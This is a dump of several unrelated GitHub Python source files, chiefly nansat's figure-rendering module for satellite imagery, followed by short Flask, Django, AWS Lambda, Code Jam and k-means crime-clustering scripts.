For adding lat/lon grid lines\n nGridLines : int\n number of lat/lon grid lines to show\n latlonLabels : int\n number of lat/lon labels to show along each side.\n transparency : int\n transparency of the image background(mask), set for PIL alpha\n mask in Figure.save()\n default : None\n\n Other parameters\n ----------------\n LEGEND_HEIGHT : float, [0 1]\n 0.1, legend height relative to image height\n CBAR_HEIGHTMIN : int\n 5, minimum colorbar height, pixels\n CBAR_HEIGHT : float, [0 1]\n 0.15, colorbar height relative to image height\n CBAR_WIDTH : float [0 1]\n 0.8, colorbar width relative to legend width\n CBAR_LOCATION_X : float [0 1]\n 0.1, colorbar offset X relative to legend width\n CBAR_LOCATION_Y : float [0 1]\n 0.5, colorbar offset Y relative to legend height\n CBTICK_LOC_ADJUST_X : int\n 5, colorbar tick label offset X, pixels\n CBTICK_LOC_ADJUST_Y : int\n 3, colorbar tick label offset Y, pixels\n CAPTION_LOCATION_X : float, [0 1]\n 0.1, caption offset X relative to legend width\n CAPTION_LOCATION_Y : float, [0 1]\n 0.1, caption offset Y relative to legend height\n TITLE_LOCATION_X : float, [0 1]\n 0.1, title offset X relative to legend width\n TITLE_LOCATION_Y :\n 0.3, title offset Y relative to legend height\n DEFAULT_EXTENSION : string\n '.png'\n\n \"\"\"\n\n # default values of ALL params of Figure\n cmin = [0.]\n cmax = [1.]\n gamma = 2.\n subsetArraySize = 100000\n numOfColor = 250\n cmapName = 'jet'\n ratio = 1.0\n numOfTicks = 5\n titleString = ''\n caption = ''\n fontRatio = 1\n fontSize = None\n logarithm = False\n legend = False\n mask_array = None\n mask_lut = None\n\n logoFileName = None\n logoLocation = [0, 0]\n logoSize = None\n\n latGrid = None\n lonGrid = None\n lonTicks = 5\n latTicks = 5\n\n transparency = None\n\n LEGEND_HEIGHT = 0.1\n CBAR_HEIGHTMIN = 5\n CBAR_HEIGHT = 0.15\n CBAR_WIDTH = 0.8\n CBAR_LOCATION_X = 0.1\n CBAR_LOCATION_Y = 0.5\n CBTICK_LOC_ADJUST_X = 5\n CBTICK_LOC_ADJUST_Y = 3\n CAPTION_LOCATION_X = 0.1\n CAPTION_LOCATION_Y = 0.25\n TITLE_LOCATION_X = 0.1\n TITLE_LOCATION_Y = 0.05\n DEFAULT_EXTENSION = '.png'\n\n palette = None\n pilImg = None\n pilImgLegend = None\n\n extensionList = ['png', 'PNG', 'tif', 'TIF', 'bmp',\n 'BMP', 'jpg', 'JPG', 'jpeg', 'JPEG']\n\n _cmapName = 'jet'\n\n # instance attributes\n array = None\n def __init__(self, nparray, **kwargs):\n \"\"\" Set attributes\n\n See class Figure(object) for information about:\n\n Modifies\n --------\n\n Parameters\n ----------\n\n Advanced parameters\n --------------------\n\n \"\"\"\n # make a copy of nparray (otherwise a new reference to the same data is\n # created and the original input data is destroyed at process())\n array = np.array(nparray)\n\n self.logger = add_logger('Nansat')\n\n # if 2D array is given, reshape to 3D\n if array.ndim == 2:\n self.array = array.reshape(1, array.shape[0], array.shape[1])\n else:\n self.array = array\n\n # note swaping of axis by PIL\n self.width = self.array.shape[2]\n self.height = self.array.shape[1]\n\n # modify the default values using input values\n self._set_defaults(kwargs)\n\n # set fonts for Legend\n self.fontFileName = os.path.join(os.path.dirname(\n os.path.realpath(__file__)),\n 'fonts/DejaVuSans.ttf')\n\n def apply_logarithm(self, **kwargs):\n \"\"\"Apply a tone curve to the array\n\n After the normalization of the values from 0 to 1, logarithm is applied\n Then the values are converted to the normal scale.\n\n **Modifies**: self.array (numpy array)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n 
\"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # apply logarithm/gamme correction to pixel values\n for iBand in range(self.array.shape[0]):\n self.array[iBand, :, :] = (\n (np.power((self.array[iBand, :, :] - self.cmin[iBand]) /\n (self.cmax[iBand] - self.cmin[iBand]),\n (1.0 / self.gamma))) *\n (self.cmax[iBand] - self.cmin[iBand]) +\n self.cmin[iBand])\n\n def apply_mask(self, **kwargs):\n \"\"\"Apply mask for coloring land, clouds, etc\n\n If mask_array and mask_lut are provided as input parameters.\n The pixels in self.array which have index equal to mask_lut key\n in mask_array will have color equal to mask_lut value.\n\n **Modifies:** self.array (numpy array)\n\n Note\n ----\n apply_mask should be called only after convert_palettesize\n (i.e. to uint8 data)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # get values of free indices in the palette\n availIndices = range(self.numOfColor, 255 - 1)\n\n # for all lut color indices\n for i, maskValue in enumerate(self.mask_lut):\n if i < len(availIndices):\n # get color for that index\n maskColor = self.mask_lut[maskValue]\n # get indices for that index\n maskIndices = self.mask_array == maskValue\n # exchange colors\n if self.array.shape[0] == 1:\n # in a indexed image\n self.array[0][maskIndices] = availIndices[i]\n elif self.array.shape[0] == 3:\n # in RGB image\n for c in range(0, 3):\n self.array[c][maskIndices] = maskColor[c]\n\n # exchange palette\n self.palette[(availIndices[i] * 3):\n (availIndices[i] * 3 + 3)] = maskColor\n\n def add_logo(self, **kwargs):\n \"\"\"Insert logo into the PIL image\n\n Read logo from file as PIL.\n Resize to the given size.\n Pan using the given location.\n Paste into pilImg.\n\n **Modifies:** self.pilImg (PIL image)\n\n Parameters\n ----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # set/get default parameters\n self._set_defaults(kwargs)\n logoFileName = self.logoFileName\n logoLocation = self.logoLocation\n logoSize = self.logoSize\n\n # check if pilImg was created already\n if self.pilImg is None:\n self.logger.warning('Create PIL image first')\n return\n # check if file is available\n try:\n logoImg = Image.open(logoFileName)\n except:\n self.logger.warning('No logo file %s' % logoFileName)\n return\n # resize if required\n if logoSize is None:\n logoSize = logoImg.size\n else:\n logoImg = logoImg.resize(logoSize)\n # get location of the logo w.r.t. 
sign of logoLocation\n box = [0, 0, logoSize[0], logoSize[1]]\n for dim in range(2):\n if logoLocation[dim] >= 0:\n box[dim + 0] = box[dim + 0] + logoLocation[dim + 0]\n box[dim + 2] = box[dim + 2] + logoLocation[dim + 0]\n else:\n box[dim + 0] = (self.pilImg.size[dim + 0] +\n logoLocation[dim + 0] -\n logoSize[dim + 0])\n box[dim + 2] = (self.pilImg.size[dim + 0] +\n logoLocation[dim + 0])\n\n self.pilImg = self.pilImg.convert('RGB')\n self.pilImg.paste(logoImg, tuple(box))\n\n def add_latlon_grids(self, **kwargs):\n \"\"\"Add lat/lon grid lines into the PIL image\n\n Compute step of the grid.\n Make matrices with binarized lat/lon.\n Find edge (make line).\n Convert to mask.\n Add mask to PIL\n\n **Modifies:** self.pilImg (PIL image), added lat/lon grid lines\n\n Parameters\n ----------\n\n latGrid : numpy array\n array with values of latitudes\n lonGrid : numpy array\n array with values of longitudes\n lonTicks : int or list\n number of lines to draw\n or locations of gridlines\n latTicks : int or list\n number of lines to draw\n or locations of gridlines\n **kwargs : dict\n any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n # test availability of grids\n if (self.latGrid is None or self.lonGrid is None):\n return\n\n # get vectors with ticks based on input\n latTicks = self._get_auto_ticks(self.latTicks, self.latGrid)\n lonTicks = self._get_auto_ticks(self.lonTicks, self.lonGrid)\n\n # convert lat/lon grids to indices\n latI = np.zeros(self.latGrid.shape, 'int8')\n lonI = np.zeros(self.latGrid.shape, 'int8')\n for latTick in latTicks:\n latI[self.latGrid > latTick] += 1\n for lonTick in lonTicks:\n lonI[self.lonGrid > lonTick] += 1\n\n # find pixels on the grid lines (binarize)\n latI = np.sum(np.gradient(latI), axis=0)\n lonI = np.sum(np.gradient(lonI), axis=0)\n\n # Set border pixels equal to nearest neighbouring pixels - the error\n # should be minor (alternatively, they should all be 0) - this and the\n # two lines above solve VisibleDeprecationWarning in numpy<1.13.0 and\n # IndexError in numpy>=1.13.0\n latI[latI.shape[0]-1, :] = latI[latI.shape[0]-2, :]\n latI[:, latI.shape[0]-1] = latI[:, latI.shape[0]-2]\n lonI[lonI.shape[0]-1, :] = lonI[lonI.shape[0]-2, :]\n lonI[:, lonI.shape[0]-1] = lonI[:, lonI.shape[0]-2]\n\n # make grid from both lat and lon\n latI += lonI\n latI[latI != 0] = 1\n\n # add mask to the image\n self.apply_mask(mask_array=latI, mask_lut={1: [255, 255, 255]})\n\n def _get_auto_ticks(self, ticks, grid):\n \"\"\"Automatically create a list of lon or lat ticks from number of list\n\n Parameters\n ----------\n ticks : int or list\n number or location of ticks\n grid : ndarray\n grid with lon or lat\n Returns\n -------\n ticks : list\n location of ticks\n\n \"\"\"\n gridMin = grid.min()\n gridMax = grid.max()\n\n if type(ticks) is int:\n ticks = np.linspace(gridMin, gridMax, ticks)\n elif type(ticks) in [list, tuple]:\n newTicks = []\n for tick in ticks:\n if tick >= gridMin and tick <= gridMax:\n newTicks.append(tick)\n ticks = newTicks\n else:\n raise ValueError('Incorrect type of ticks')\n\n return ticks\n\n def add_latlon_labels(self, **kwargs):\n \"\"\"Add lat/lon labels along upper and left side\n\n Compute step of lables.\n Get lat/lon for these labels from latGrid, lonGrid\n Print lables to PIL in white.\n\n **Modifies:** self.pilImg (PIL image), added lat/lon labels\n\n Parameters\n ----------\n latGrid : numpy array\n array with values of latitudes\n lonGrid : numpy array\n array with values of longitudes\n 
lonTicks : int or list\n number of lines to draw\n or locations of gridlines\n latTicks : int or list\n number of lines to draw\n or locations of gridlines\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n # test availability of grids\n if (self.latGrid is None or self.lonGrid is None):\n return\n\n draw = ImageDraw.Draw(self.pilImg)\n font = ImageFont.truetype(self.fontFileName, self.fontSize)\n\n # get vectors with ticks based on input\n latTicks = self._get_auto_ticks(self.latTicks, self.latGrid)\n lonTicks = self._get_auto_ticks(self.lonTicks, self.lonGrid)\n\n # get corresponding lons from upper edge and lats from left edge\n lonTicksIdx = self._get_tick_index_from_grid(lonTicks, self.lonGrid,\n 1, self.lonGrid.shape[1])\n latTicksIdx = self._get_tick_index_from_grid(latTicks, self.latGrid,\n self.lonGrid.shape[0], 1)\n\n # draw lons\n lonsOffset = self.lonGrid.shape[1] / len(lonTicksIdx) / 8.\n for lonTickIdx in lonTicksIdx:\n lon = self.lonGrid[0, lonTickIdx]\n draw.text((lonTickIdx+lonsOffset, 0), '%4.2f' % lon,\n fill=255, font=font)\n\n # draw lats\n latsOffset = self.latGrid.shape[0] / len(latTicksIdx) / 8.\n for latTickIdx in latTicksIdx:\n lat = self.latGrid[latTickIdx, 0]\n draw.text((0, latTickIdx+latsOffset), '%4.2f' % lat,\n fill=255, font=font)\n\n def _get_tick_index_from_grid(self, ticks, grid, rows, cols):\n \"\"\"Get index of pixels from lon/lat grids closest given ticks\n\n Parameters\n ----------\n ticks : int or list\n number or location of ticks\n grid : ndarray\n grid with lon or lat\n rows : int\n from which rows to return pixels\n cols : int\n from which cols to return pixels\n\n Returns\n -------\n ticks : list\n index of ticks\n\n \"\"\"\n newTicksIdx = []\n for tick in ticks:\n diff = np.abs(grid[:rows, :cols] - tick).flatten()\n minDiffIdx = np.nonzero(diff == diff.min())[0][0]\n if minDiffIdx > 0:\n newTicksIdx.append(minDiffIdx)\n return newTicksIdx\n\n def clim_from_histogram(self, **kwargs):\n \"\"\"Estimate min and max pixel values from histogram\n\n if ratio=1.0, simply the minimum and maximum values are returned.\n if 0 < ratio < 1.0, get the histogram of the pixel values.\n Then get rid of (1.0-ratio)/2 from the both sides and\n return the minimum and maximum values.\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n Returns\n --------\n clim : numpy array 2D ((3x2) or (1x2))\n minimum and maximum pixel values for each band\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n ratio = self.ratio\n\n # find masked pixels if mask_array and mask_lut provided\n masked = None\n if self.mask_array is not None and self.mask_lut is not None:\n masked = np.zeros(self.mask_array.shape, 'bool')\n for lutVal in self.mask_lut:\n masked = masked + (self.mask_array == lutVal)\n\n # create a ratio list for each band\n if not (isinstance(ratio, float) or isinstance(ratio, int)):\n raise ValueError('Incorrect input ratio %s' % str(ratio))\n\n # create a ratio list for each band\n if ratio <= 0 or ratio > 1:\n raise ValueError('Incorrect input ratio %s' % str(ratio))\n\n # create a 2D array and set min and max values\n clim = [[0] * self.array.shape[0], [0] * self.array.shape[0]]\n for iBand in range(self.array.shape[0]):\n bandArray = self.array[iBand, :, :]\n # remove masked data\n if masked is not None:\n bandArray = bandArray[masked == 0]\n # remove nan, inf\n bandArray = bandArray[np.isfinite(bandArray)]\n # get percentile\n percentileMin = 100 * (1 - ratio) 
/ 2.\n percentileMax = 100 * (1 - (1 - ratio) / 2.)\n if bandArray.size > 0:\n clim[0][iBand] = np.percentile(bandArray, percentileMin)\n clim[1][iBand] = np.percentile(bandArray, percentileMax)\n else:\n clim[0][iBand], clim[1][iBand] = 0, 1\n\n self.color_limits = clim\n return clim\n\n def clip(self, **kwargs):\n \"\"\"Convert self.array to values between cmin and cmax\n\n if pixel value < cmin, replaced to cmin.\n\n if pixel value > cmax, replaced to cmax.\n\n **Modifies:** self.array (numpy array)\n\n **Modifies:** self.cmin, self.cmax : allowed min/max values\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n for iBand in range(self.array.shape[0]):\n # if clipping integer matrix, make clipping ranges valid\n if self.array.dtype in ['int8', 'uint8', 'int16', 'uint16']:\n self.cmin[iBand] = np.ceil(self.cmin[iBand])\n self.cmin[iBand] = np.floor(self.cmin[iBand])\n\n # Clipping, allowing for reversed colorscale (cmin > cmax)\n clipMin = np.min([self.cmin[iBand], self.cmax[iBand]])\n clipMax = np.max([self.cmin[iBand], self.cmax[iBand]])\n self.array[iBand, :, :] = np.clip(self.array[iBand, :, :],\n clipMin, clipMax)\n\n def convert_palettesize(self, **kwargs):\n \"\"\"Convert self.array to palette color size in uint8\n\n **Modifies:** self.array (numpy array)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n for iBand in range(self.array.shape[0]):\n self.array[iBand, :, :] = (\n (self.array[iBand, :, :].astype('float32') -\n self.cmin[iBand]) *\n (self.numOfColor - 1) /\n (self.cmax[iBand] - self.cmin[iBand]))\n\n self.array = self.array.astype(np.uint8)\n\n def create_legend(self, **kwargs):\n \"\"\"self.legend is replaced from None to PIL image\n\n PIL image includes colorbar, caption, and titleString.\n\n **Modifies:** self.legend (PIL image)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # set fonts size for colorbar\n font = ImageFont.truetype(self.fontFileName, self.fontSize)\n\n # create a pilImage for the legend\n self.pilImgLegend = Image.new('P', (self.width,\n int(self.height *\n self.LEGEND_HEIGHT)), 255)\n draw = ImageDraw.Draw(self.pilImgLegend)\n\n # set black color\n if self.array.shape[0] == 1:\n black = 254\n else:\n black = (0, 0, 0)\n\n # if 1 band, draw the color bar\n if self.array.shape[0] == 1:\n # make an array for color bar\n bar = np.outer(np.ones(max(int(self.pilImgLegend.size[1] *\n self.CBAR_HEIGHT), self.CBAR_HEIGHTMIN)),\n np.linspace(0, self.numOfColor,\n int(self.pilImgLegend.size[0] *\n self.CBAR_WIDTH)))\n # create a colorbar pil Image\n pilImgCbar = Image.fromarray(np.uint8(bar))\n # paste the colorbar pilImage on Legend pilImage\n self.pilImgLegend.paste(pilImgCbar,\n (int(self.pilImgLegend.size[0] *\n self.CBAR_LOCATION_X),\n int(self.pilImgLegend.size[1] *\n self.CBAR_LOCATION_Y)))\n # create a scale for the colorbar\n scaleLocation = np.linspace(0, 1, self.numOfTicks)\n scaleArray = scaleLocation\n if self.logarithm:\n scaleArray = (np.power(scaleArray, (1.0 / self.gamma)))\n scaleArray = (scaleArray * (self.cmax[0] -\n self.cmin[0]) + self.cmin[0])\n scaleArray = list(map(self._round_number, scaleArray))\n # draw scales and lines on the legend pilImage\n for iTick in range(self.numOfTicks):\n coordX = int(scaleLocation[iTick] *\n self.pilImgLegend.size[0] 
*\n self.CBAR_WIDTH +\n int(self.pilImgLegend.size[0] *\n self.CBAR_LOCATION_X))\n\n box = (coordX, int(self.pilImgLegend.size[1] *\n self.CBAR_LOCATION_Y),\n coordX, int(self.pilImgLegend.size[1] *\n (self.CBAR_LOCATION_Y +\n self.CBAR_HEIGHT)) - 1)\n draw.line(box, fill=black)\n box = (coordX + self.CBTICK_LOC_ADJUST_X,\n int(self.pilImgLegend.size[1] *\n (self.CBAR_LOCATION_Y +\n self.CBAR_HEIGHT)) +\n self.CBTICK_LOC_ADJUST_Y)\n draw.text(box, scaleArray[iTick], fill=black, font=font)\n\n # draw longname and units\n box = (int(self.pilImgLegend.size[0] * self.CAPTION_LOCATION_X),\n int(self.pilImgLegend.size[1] * self.CAPTION_LOCATION_Y))\n draw.text(box, str(self.caption), fill=black, font=font)\n\n # if titleString is given, draw it\n if self.titleString != '':\n # write text each line onto pilImgCanvas\n textHeight = int(self.pilImgLegend.size[1] *\n self.TITLE_LOCATION_Y)\n for line in self.titleString.splitlines():\n draw.text((int(self.pilImgLegend.size[0] *\n self.TITLE_LOCATION_X),\n textHeight), line, fill=black, font=font)\n text = draw.textsize(line, font=font)\n textHeight += text[1]\n\n def create_pilImage(self, **kwargs):\n \"\"\"self.create_pilImage is replaced from None to PIL image\n\n If three images are given, create a image with RGB mode.\n if self.pilImgLegend is not None, it is pasted.\n\n If one image is given, create a image with P(palette) mode.\n if self.pilImgLegend is not None,\n self.array is extended before create the pilImag and\n then paste pilImgLegend onto it.\n\n **Modifies:** self.pilImg (PIL image), PIL image with / without the legend\n\n **Modifies:** self.array (replace to None)\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # if legend is created, expand array with empty space below the data\n if self.pilImgLegend is not None:\n appendArray = 255 * np.ones((self.array.shape[0],\n self.pilImgLegend.size[1],\n self.width), 'uint8')\n self.array = np.append(self.array, appendArray, 1)\n\n # create a new PIL image from three bands (RGB) or from one (palette)\n if self.array.shape[0] == 3:\n self.pilImg = Image.merge('RGB',\n (Image.fromarray(self.array[0, :, :]),\n Image.fromarray(self.array[1, :, :]),\n Image.fromarray(self.array[2, :, :])))\n else:\n self.pilImg = Image.fromarray(self.array[0, :, :])\n self.pilImg.putpalette(self.palette)\n\n # append legend\n if self.pilImgLegend is not None:\n self.pilImg.paste(self.pilImgLegend, (0, self.height))\n\n def process(self, **kwargs):\n \"\"\"Do all common operations for preparation of a figure for saving\n\n #. Modify default values of parameters by the provided ones (if any)\n #. Clip to min/max\n #. Apply logarithm if required\n #. Convert data to uint8\n #. Create palette\n #. Apply mask for colouring land, clouds, etc if required\n #. Create legend if required\n #. Create PIL image\n #. Add logo if required\n\n **Modifies:** self.d\n\n **Modifies:** self.array\n\n **Modifies:** self.palette\n\n **Modifies:** self.pilImgLegend\n\n **Modifies:** self.pilImg\n\n Parameters\n -----------\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default parameters\n self._set_defaults(kwargs)\n\n # set fontSize using fontRatio if fontSize is not given at input\n if self.fontSize is None:\n self.fontSize = int(self.array.shape[1] / 45. 
* self.fontRatio)\n\n # if the image is reprojected it has 0 values\n # we replace them with mask before creating PIL Image\n self.reprojMask = self.array[0, :, :] == 0\n\n # clip values to min/max\n self.clip()\n\n # apply logarithm\n if self.logarithm:\n self.apply_logarithm()\n\n # convert to uint8\n self.convert_palettesize()\n\n # create the paletter\n self._create_palette()\n\n # apply colored mask (land mask, cloud mask and something else)\n if self.mask_array is not None and self.mask_lut is not None:\n self.apply_mask()\n\n # add lat/lon grids lines if latGrid and lonGrid are given\n self.add_latlon_grids()\n\n # append legend\n if self.legend:\n self.create_legend()\n\n # create PIL image ready for saving\n self.create_pilImage(**kwargs)\n\n # add labels with lats/lons\n self.add_latlon_labels()\n\n # add logo\n if self.logoFileName is not None:\n self.add_logo()\n\n def _make_transparent_color(self):\n \"\"\"makes colors specified by self.transparency\n and self.reprojMask (if the image is reprojected) transparent\n\n **Modifies:** self.pilImg (PIL image), Adds transparency to PIL image\n\n \"\"\"\n self.pilImg = self.pilImg.convert('RGBA')\n datas = self.pilImg.getdata()\n newData = list()\n\n for item in datas:\n if (item[0] == self.transparency[0] and\n item[1] == self.transparency[1] and\n item[2] == self.transparency[2]):\n newData.append((255, 255, 255, 0))\n else:\n newData.append(item)\n\n self.pilImg.putdata(newData)\n\n # The alphaMask is set in process() before clip() the Image\n img = np.array(self.pilImg)\n img[:, :, 3][self.reprojMask] = 0\n self.pilImg = Image.fromarray(np.uint8(img))\n\n def save(self, fileName, **kwargs):\n \"\"\"Save self.pilImg to a physical file\n\n If given extension is JPG, convert the image mode from Palette to RGB.\n\n **Modifies:** self.pilImg (None)\n\n Parameters\n ----------\n fileName : string\n name of outputfile\n **kwargs : dict\n Any of Figure parameters\n\n \"\"\"\n # modify default values\n self._set_defaults(kwargs)\n\n if not((fileName.split('.')[-1] in self.extensionList)):\n fileName = fileName + self.DEFAULT_EXTENSION\n\n fileExtension = fileName.split('.')[-1]\n if fileExtension in ['jpg', 'JPG', 'jpeg', 'JPEG']:\n self.pilImg = self.pilImg.convert('RGB')\n\n if self.transparency is not None:\n self._make_transparent_color()\n self.pilImg.save(fileName)\n\n def _create_palette(self):\n \"\"\"Create a palette based on Matplotlib colormap name\n\n default number of color palette is 250.\n it means 6 colors are possible to use for other purposes.\n the last palette (255) is white and the second last (254) is black.\n\n **Modifies:** self.palette (numpy array) (uint8)\n\n \"\"\"\n if not MATPLOT_LIB_IS_INSTALLED:\n # Make grayscale colormap\n cmap = np.vstack([np.arange(256.),\n np.arange(256.),\n np.arange(256.),\n np.ones(256)*255]).T\n cmapLUT = cmap[:self.numOfColor, :]\n else:\n # test if given colormap name is in builtin or added colormaps\n try:\n cmap = cm.get_cmap(self.cmapName)\n except:\n self.logger.error('%s is not a valid colormap' % self.cmapName)\n self.cmapName = self._cmapName\n # get colormap by name\n cmap = cm.get_cmap(self.cmapName)\n # get colormap look-up\n cmapLUT = np.uint8(cmap(range(self.numOfColor)) * 255)\n\n # replace all last colors to black and...\n lut = np.zeros((3, 256), 'uint8')\n lut[:, :self.numOfColor] = cmapLUT.T[:3]\n # ...and the most last color to white\n lut[:, -1] = 255\n\n # set palette to be used by PIL\n self.palette = lut.T.flatten().astype(np.uint8)\n\n def 
_round_number(self, val):\n \"\"\"Return writing format for scale on the colorbar\n\n Parameters\n ----------\n val : int / float / exponential\n\n Returns\n --------\n colorbar format : str\n\n \"\"\"\n frmts = {-2: '%.2f', -1: '%.1f', 0: '%.2f',\n 1: '%.1f', 2: '%d', 3: '%d'}\n if val == 0:\n frmt = '%d'\n else:\n digit = floor(log10(abs(val)))\n if digit in frmts:\n frmt = frmts[digit]\n else:\n frmt = '%.' + '%d' % abs(digit) + 'f'\n\n return str(frmt % val)\n\n def _set_defaults(self, idict):\n \"\"\"Check input params and set default values\n\n Look through default parameters (self.d) and given parameters (dict)\n and paste value from input if the key matches\n\n Parameters\n ----------\n idict : dictionary\n parameter names and values\n\n Modifies\n --------\n default self attributes\n\n \"\"\"\n for key in idict:\n if hasattr(self, key):\n if key in ['cmin', 'cmax'] and type(idict[key]) != list:\n setattr(self, key, [idict[key]])\n else:\n setattr(self, key, idict[key])\n","repo_name":"nansencenter/nansat","sub_path":"nansat/figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":34808,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"61"} +{"seq_id":"70895170433","text":"'''Application Initialization'''\nimport logging\n\nfrom flask import Flask\nfrom flask_restful import (\n Resource,\n Api,\n)\nfrom resources import FontExtractionResource\n\napp = Flask(__name__)\n\napi = Api(app)\napi.add_resource(FontExtractionResource, '/font_extraction', endpoint='font_extraction')\n\n\nif __name__ == '__main__':\n '''Initialize app and run server'''\n logging.basicConfig(level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n logger.debug(app.config.get('DEBUG'))\n app.run(debug=True, host='0.0.0.0')","repo_name":"kalliefriedman/font-family-parser","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34740945404","text":"from django.urls import path\n\n# local imports\nfrom user_profile.views.profile import ProfileUpdateView, ProfileView\nfrom user_profile.views.user import LoginView, RegisterView, LogOutView\napp_name = 'user_profile'\n\nurlpatterns = [\n path('logout/', LogOutView.as_view(), name='logout'),\n path('login/', LoginView.as_view(), name='login'),\n path('register/', RegisterView.as_view(), name='register'),\n path('profile/view/', ProfileView.as_view(), name='profile_view'),\n path(\n 'profile//update/', ProfileUpdateView.as_view(),\n name='profile_update'\n ),\n]\n","repo_name":"Rayhun/meal-management-system","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40781461452","text":"import json\nfrom crhelper import CfnResource\n\nhelper = CfnResource()\n\n@helper.create\ndef resolve(event, _):\n dictionary = json.loads(event['ResourceProperties']['String'])\n\n helper.Data.update(dictionary)\n\ndef handler(event, context):\n print(event)\n\n helper(event, context)\n","repo_name":"aws-samples/cloudformation-cross-stack-dependency","sub_path":"json-parser/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1400135899","text":"from itertools import combinations\r\nimport numpy as 
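A minimal usage sketch for the Figure class above, outside of Nansat.write_figure (hypothetical data; clim_from_histogram returns per-band [mins, maxs] lists that can be fed straight back into process):

import numpy as np

data = np.random.rand(200, 300)  # hypothetical single-band 2D array
fig = Figure(data, cmapName='jet', legend=True,
             caption='value, a.u.', titleString='Demo')
clim = fig.clim_from_histogram(ratio=0.95)
fig.process(cmin=clim[0], cmax=clim[1])
fig.save('demo.png')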
np\r\n\r\nthreshold = 200\r\n\r\ndef calc_distance(points):\r\n detect = np.zeros(len(points))\r\n seq = combinations(points, 2)\r\n for point in list(seq):\r\n distance = euclid(point[0], point[1])\r\n if int(distance) < threshold:\r\n detect[points.index(point[0])] = 1\r\n detect[points.index(point[1])] = 1\r\n return detect\r\n\r\ndef euclid(a, b):\r\n return ((a[0]-b[0])**2 + (a[1]-b[1])**2)**(1/2)","repo_name":"yesayayova/monitoring-pd","sub_path":"distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23571288051","text":"from heapq import *\n\ndef printResult(maxi, mini, number):\n print('Case #{}: {} {}'.format(number, maxi, mini))\n\nfor tc in range(int(input().strip())):\n n, k = [int(x) for x in input().strip().split()]\n maxHeap = []\n heappush(maxHeap, n * -1)\n for i in range(k):\n longest = heappop(maxHeap) * -1\n if longest == 0:\n Ls = 0\n Rs = 0\n else:\n Ls = int((longest - 1) / 2)\n Rs = longest - 1 - Ls\n heappush(maxHeap, Ls * -1)\n heappush(maxHeap, Rs * -1)\n if i == k - 1:\n printResult(max(Ls, Rs), min(Ls, Rs), tc+1)\n\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2758.py","file_name":"2758.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408223135","text":"import urllib.request\nimport json\nimport pandas as pd\nimport numpy as np\nimport dml\nimport prov.model\nimport datetime\nimport uuid\nimport sys\nfrom bson import json_util\nfrom sklearn.cluster import KMeans\nimport matplotlib as mp\nmp.use('Agg')\nimport matplotlib.pyplot as plt\n\nclass kmeans_crime_incidents(dml.Algorithm):\n contributor = 'esaracin'\n reads = ['esaracin.crime_incidents']\n writes = ['esaracin.crime_incident_centers']\n\n @staticmethod\n def execute(trial = False):\n '''Retrieves our data sets from Boston Open Data using specific URLs.\n Creates the necessary pymongo collections within our repo database.'''\n \n startTime = datetime.datetime.now()\n\n # Set up the database connection.\n client = dml.pymongo.MongoClient()\n repo = client.repo\n repo.authenticate('esaracin', 'esaracin')\n\n # Grab all of our two databases that we're reading from.\n # Note that, if trial is set to True, we only take a random, 5% sample\n # of our overall crime_incidents, to speed things up.\n dataset = repo['esaracin.crime_incidents'].find()\n df_crime = pd.DataFrame(list(dataset))\n if(trial == True):\n df_crime = df_crime.sample(frac=.05)\n\n\n\n # Extract the lat/long tuples.\n location = df_crime['Location']\n\n df_coordinates = {key:[] for key in ['Latitude', 'Longitude']}\n\n for index, row in df_crime.iterrows():\n lat_long = eval(row['Location'])\n \n # There are many entries without Lat/Long data; remove them so as\n # to avoid affecting the clustering.\n if(lat_long == (0, 0) or lat_long == (-1, -1)):\n continue\n\n df_coordinates['Latitude'] += [lat_long[0]]\n df_coordinates['Longitude'] += [lat_long[1]]\n\n df_coordinates = pd.DataFrame(df_coordinates)\n\n # Now, we can run kmeans++ on our set of coordinates to find the best\n # cluster centers.\n kmeans = KMeans(init='k-means++', n_clusters=5)\n kmeans.fit_predict(df_coordinates)\n clusters, centers = kmeans.labels_, kmeans.cluster_centers_\n\n\n new_df = {key:[] for key in ['Latitude', 'Longitude']}\n for center in centers:\n new_df['Latitude'] += 
